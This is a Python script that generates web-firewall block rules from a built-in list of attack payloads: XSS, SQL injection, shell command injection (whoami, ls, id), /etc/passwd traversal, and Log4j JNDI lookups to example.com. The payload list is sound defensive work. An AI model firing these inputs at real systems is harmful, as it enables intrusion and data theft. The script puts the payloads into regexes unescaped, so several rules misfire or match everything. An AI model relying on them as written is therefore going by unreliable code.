get_vulnerability_rules.py

import json
import logging

logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')

def generate_vulnerability_rules(output_path):
    """Generates rules from a predefined list of vulnerability payloads."""
    all_rules = []
    payloads = {
      "xss": {
          "patterns": [
               "<script>alert(1)</script>",
               "<img src=x onerror=alert(1)>",
               "javascript:alert(1)",
               "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" #base64 encoded script tag
          ],
          "targets": ["ARGS", "BODY", "HEADERS"]
      },
      "sqli": {
          "patterns": [
               "1' OR '1'='1",
               "'; SELECT * FROM users;",
               "\" OR \"1\"=\"1",
               "UNION SELECT 1,2,3;"
           ],
          "targets": ["ARGS", "BODY", "HEADERS"]
      },
      "rce": {
          "patterns": [
                "`whoami`",
                "$(whoami)",
                "; ls -la;",
                "| id"
          ],
           "targets": ["ARGS", "HEADERS"]
      },
       "lfi":{
          "patterns":[
            "../etc/passwd",
            "../../../../etc/passwd"
          ],
           "targets":["URI"]
      },
      "log4j": {
            "patterns": [
                "${jndi:ldap://example.com/a}",
                "${jndi:rmi://example.com/b}",
                "${jndi:dns://example.com/c}"
            ],
            "targets": ["ARGS", "BODY", "HEADERS"]
        },
    }

    rule_counter = 0
    for vuln_type, data in payloads.items():
      for pattern in data["patterns"]:
        rule = {
            "id": f"{vuln_type}-{rule_counter}",
            "phase": 2,
            "pattern": f"(?i){pattern}",
            "targets": data["targets"],
            "severity": "HIGH",
            "action": "block",
            "score": 7,
            "description": f"Detects {vuln_type} attack payload: {pattern}"
        }
        all_rules.append(rule)
        rule_counter += 1
    logging.info(f"Generated {len(all_rules)} rules from vulnerability payloads.")
    with open(output_path, 'w') as f:
         json.dump(all_rules, f, indent=2)
    logging.info(f"Saved {len(all_rules)} rules to {output_path}")

if __name__ == "__main__":
    output_path = "vulnerability_rules.json"
    generate_vulnerability_rules(output_path)